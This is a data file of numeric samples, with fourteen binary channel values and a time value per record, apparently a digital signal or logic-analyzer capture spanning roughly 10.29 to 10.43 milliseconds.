0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293004e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293028e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293056e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293080e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293108e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293132e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293156e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293180e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293204e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293228e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293256e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293280e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293308e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293332e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293356e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293380e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293404e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293428e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293456e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293480e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293508e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293532e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293556e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293580e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293604e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293628e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293656e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293680e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293708e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293732e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293756e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293780e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293804e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293828e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293856e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293880e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293908e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0293956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0293980e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294004e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294028e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294056e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294084e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294108e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294132e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294156e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294180e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294204e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294228e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294256e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294284e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294308e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294332e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294356e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294380e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294404e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294428e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294460e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294484e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294508e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294532e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294556e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294580e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294608e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294628e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294660e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294684e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294708e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294732e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294756e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294780e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294808e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294832e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294860e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294884e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294908e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0294956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0294980e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295008e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295032e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295060e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295084e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295108e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295132e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295156e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295180e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295208e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295232e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295260e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295284e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295308e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295332e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295356e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295380e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295408e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295432e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295460e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295484e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295508e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295532e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295556e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295580e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295608e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295632e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295660e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295684e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295708e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295732e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295756e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295780e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295808e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295832e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295860e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295884e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295908e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295932e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0295956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0295980e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0296008e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0296032e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0296060e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0296092e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0296116e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0296140e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0296168e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0296192e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,1.0420692e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,1.0420860e-02 1,1,1,1,1,0,0,0,0,0,0,1,0,1,1.0420884e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,1.0420908e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0421460e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0421956e-02 1,1,1,1,1,0,0,0,0,1,0,0,1,0,1.0421984e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0421988e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0421992e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0422012e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0422036e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0422044e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0422084e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0422112e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0422116e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0422136e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0422160e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0422168e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0422212e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0422236e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0422244e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0422260e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0422284e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0422292e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0422308e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0422336e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0422340e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0422360e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0422388e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,1.0422392e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0422396e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0422436e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0422460e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0422512e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0422536e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0422588e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0422612e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0422616e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0422636e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0422660e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0422712e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0422736e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,1.0422740e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0422744e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0422764e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,1.0422788e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0422792e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0422836e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0422860e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0422868e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0422884e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0422908e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0422936e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0422960e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0422988e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0423012e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0423036e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,1.0423060e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0423064e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0423112e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0423136e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,1.0423140e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0423144e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0423164e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,1.0423188e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0423192e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0423212e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0423236e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0423244e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0423284e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0423312e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0423364e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0423388e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0423436e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,1.0423460e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0423464e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0423484e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0423508e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0423564e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0423588e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,1.0423592e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0423596e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0423612e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0423636e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,1.0423640e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0423644e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0423660e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0423684e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0423692e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0423736e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0423764e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0423812e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0423836e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0423884e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0423912e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0423964e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,1.0423988e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0423992e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0424012e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0424036e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0424044e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0424060e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0424084e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0424108e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0424136e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0424140e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0424188e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0424212e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0424220e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0424236e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0424260e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0424284e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0424308e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0424336e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0424360e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0424388e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0424412e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0424436e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,1.0424460e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0424464e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0424512e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0424536e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0424564e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0424588e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,1.0424592e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0424596e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0424636e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0424660e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0424716e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0424740e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0424792e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0424820e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0424844e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0424868e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0424876e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0424892e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0424916e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0424944e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0424968e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0424996e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425020e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0425044e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425068e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0425092e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425116e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0425124e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0425172e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0425196e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,1.0425200e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425204e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0425220e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425244e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0425268e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425292e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0425316e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425344e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0425348e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.0425396e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.0425420e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425428e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0425444e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425468e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0425492e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425516e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0425544e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425568e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0425596e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425620e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0425644e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425668e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0425692e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425716e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0425744e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425768e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0425796e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425820e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0425844e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425868e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0425892e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425916e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0425944e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0425968e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0425996e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426020e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426044e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426068e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426092e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426116e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426144e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426168e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426196e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426220e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426244e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426268e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426292e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426316e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426344e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426368e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426396e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426420e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426444e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426468e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426496e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426520e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426548e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426572e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426596e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426620e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426644e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426668e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426696e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426720e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426748e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426772e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426796e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426820e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426844e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426868e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426896e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426920e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426948e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0426972e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0426996e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427020e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427044e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427068e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427096e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427120e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427148e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427172e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427196e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427220e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427244e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427268e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427296e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427320e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427348e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427372e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427396e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427420e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427444e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427468e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427496e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427520e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427548e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427572e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427596e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427620e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427644e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427668e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427696e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427720e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427748e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427772e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427796e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427820e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427844e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427868e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427896e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427920e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427948e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0427972e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0427996e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428020e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0428044e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428068e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0428096e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428120e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0428148e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428172e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0428196e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428220e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0428244e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428268e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0428296e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428320e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0428348e-02 